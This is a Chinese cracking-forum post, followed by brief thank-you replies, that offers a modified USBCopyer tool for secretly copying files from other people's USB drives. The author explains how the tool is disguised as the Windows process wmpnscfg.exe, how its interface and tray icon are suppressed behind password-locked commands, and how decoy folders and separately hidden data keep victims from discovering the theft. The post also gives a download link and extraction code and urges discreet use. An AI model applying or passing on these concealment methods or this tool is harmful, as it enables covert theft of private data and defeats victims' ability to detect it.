请选择 进入手机版 | 继续访问电脑版

93破解-安卓破解-原创软件-技术资源分享-www.93pojie.com

 找回密码
立即注册
查看: 758|回复: 63

[原创] U盘文件偷拷 USBCopyer V5.11 伪装隐藏修改版

  [复制链接]
发表于 2021-12-16 13:48:27 | 显示全部楼层 |阅读模式
说起这个USBCopyer,估计有一些大佬是很熟悉的。原软件虽然自带隐藏运行功能,但是我认为还不够,只要是熟悉这个软件的人,通过查找任务管理器进程就能找到,毕竟那个图标和进程名有点太明显了,被使用者此时只要继续顺藤摸瓜,右键定位进程路径,就能轻易找到软件和拷贝出的数据,使用者之前一切“精心”准备可以说都要泡汤了,搞不好还会得到一通问罪,这样的结果肯定是每个使用者都不想面对的。所以,对USBCopyer进行魔改是很有必要的,目标是尽力将带有USBCopyer的元素(图标、配置路径、文件属性等)尽可能替换或隐藏掉,这样就可以达到不被被使用者发现的目的。
隐藏一个进程其中一个好办法就是让它伪装成系统程序,不被人注意的系统后台程序就是一个很好的伪装对象,至于具体伪装成什么进程呢?根据我使用“进程截杀器”关闭后台节省内存的使用经验,wmpnscfg就很不错。这个后台进程是windows media player的网络共享进程,win7大概每次开机都会启动(win10里似乎没见到过这个,不过问题不大),而且有彩色图标。于是在修改源代码中封装的部分(assembly什么的)以及“Restorator 2018”的协助下,我成功将USBCopyer戴上了wmpnscfg的“面具”。
戴上了面具其实还没有结束,双击exe的情况下,USBCopyer的真面目还是会露出来(跳出托盘图标),虽然软件工作时是以隐藏模式运行的,但是谁又能保证不出意外呢?于是,我一个不懂C++的小白开始研究了起来,幸亏之前自己电脑上装了VS2019,打开项目才没有遇到多大阻力。经过我一次次摸索和试错,最后还真的被我“瞎猫碰上死耗子”给捣鼓出来了,这下再怎么双击exe都不会跳出托盘图标了,而且为了保险起见,所有能跳出窗口或托盘图标的命令(/gui、/setting、/reset)都被我改了,命令参数里还加上了64位字母数字组合的一串密码。这下即使是熟悉这些命令的人,也不可能在没有反编译软件的帮助下破解出开启软件GUI界面的命令;如果真的碰上了反编译高手,先不说在wmpnscfg的迷惑下他可能都不会有进行反编译的念头,光是反编译所花的时间之长,也足以让程序拷出相当可观的数据量(emmm,在反编译开始前就结束进程的情况除外,不过被发现之前的那段时间也足够程序发挥出自己的作用了);而且对于这个境界的人,他的U盘多多少少会有些特殊保护(加密或者隐藏),再来讨论偷拷已经没有意义了。如此,也就很难揭开这个程序的真面目了。而且,软件在关闭“允许多线程”选项的情况下,保留的永远是启动的第一个线程,换句话说,即使双击exe,也不会终止之前已经启动完毕且正在进行拷贝的程序,这点可以放心。此外,在不结束进程的情况下,exe和存放数据的文件夹会被占用,也删除不了(这一点似乎是我考虑多了,有点经验的人都会先终止进程,再删文件)
有了双击不能弹出托盘图标作为保证,接下来我就可以再来增加一些迷惑性的措施,使那些通过定位进程查找文件路径的人再被迷惑一次。有人估计会说,把软件和数据所在的文件夹统统隐藏掉不好吗?这里引用《斗罗大陆》主角唐三的一句话——“视野中若有了焦点,就一定会存在盲点”,如果真的全隐藏起来,弹出的资源管理器窗口里就会是空空的一片,只要稍微有点警惕的人都会觉得这似乎有点不太正常,反而大大方方地放几个东西在那儿作为诱饵,让被使用者眼中出现“焦点”,就不会让人起疑心。放在那儿作为诱饵的自然就是wmpnscfg.exe和一个看起来像是记录日志和数据的文件夹。至于真正的数据文件,早就单独隐藏好了。即使出现意外,被使用者手一抖,把这个进程结束了,还把wmpnscfg.exe和用来迷惑的文件夹删了,从被使用者U盘拷出的部分数据也依旧存在,虽然可能不完整,但是被使用者也大概率发现不了拷出的数据在哪,相比被发现之后使用者受到一通问罪来说,已经是很好的结果了。
至此,USBCopyer的隐藏性和迷惑性已经拉满,应该不会给使用者拖后腿了吧。


哔哔了一堆,是时候放链接了:
https://www.lanzoup.com/b01iy0n3a
提取码:4to1


(提取码最后一位是数字一,倒数第二位是小写字母o)
“USBCopyer部署XP7.zip”和“USBCopyer部署810.zip”是软件本体;
“软件教程.zip”是软件的视频教程和文本说明;
另外两个开头带有“【源码】”字样的是代码,一个是没有动过的,一个是我修改的。

此外,软件也有2个不怎么影响使用的小bug:一个是版本号变成wmpnscfg的版本号了,不知是怎么回事,我只是改了封装的assembly信息,没有刻意去改软件界面(只不过把图标换了下);另一个是软件的重置功能不管是在GUI还是命令行都似乎不起效果,我手动在批处理里加了个删除config.xml的命令用来替换它(这个方法是可行的),希望有能力和精力的大佬可以完善一下这两个bug。


最后容我再唠叨几句,虽然我已经尽力将软件的隐藏迷惑属性拉满,但我也不能保证100%不会被被使用者发现拷贝的数据,所以

请务必谨慎低调使用本软件
请务必谨慎低调使用本软件
请务必谨慎低调使用本软件

重要的话说三遍

132019do7vzulv8srjnsp2.png

回复

使用道具 举报

发表于 2021-12-19 01:53:39 | 显示全部楼层
感谢楼主,好人一生平安
回复

使用道具 举报

发表于 2021-12-19 11:27:48 | 显示全部楼层
遇见神贴岂能不顶
回复

使用道具 举报

发表于 2021-12-20 18:21:10 | 显示全部楼层
多谢大佬分享
回复

使用道具 举报

发表于 2021-12-23 14:50:02 | 显示全部楼层
顶帖是一种态度,也是一种尊重。
回复

使用道具 举报

发表于 2021-12-26 01:52:59 | 显示全部楼层
感谢楼主分享!93有你更精彩!
回复

使用道具 举报

发表于 2022-1-9 11:55:08 | 显示全部楼层
好东西收下了
回复

使用道具 举报

发表于 2022-1-17 23:51:58 | 显示全部楼层
感谢感谢
回复

使用道具 举报

发表于 2022-1-18 20:36:24 | 显示全部楼层
感谢楼主分享
回复

使用道具 举报

发表于 2022-1-22 05:04:38 | 显示全部楼层
感谢感谢
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则


免责声明:
93破解论坛所发布的一切破解补丁、注册机和注册信息及软件的解密分析文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。

E-Mail

RRS订阅|小黑屋|93破解论坛

GMT+8, 2022-12-1 12:07

Powered by Discuz!

Copyright © 2021.

快速回复 返回顶部 返回列表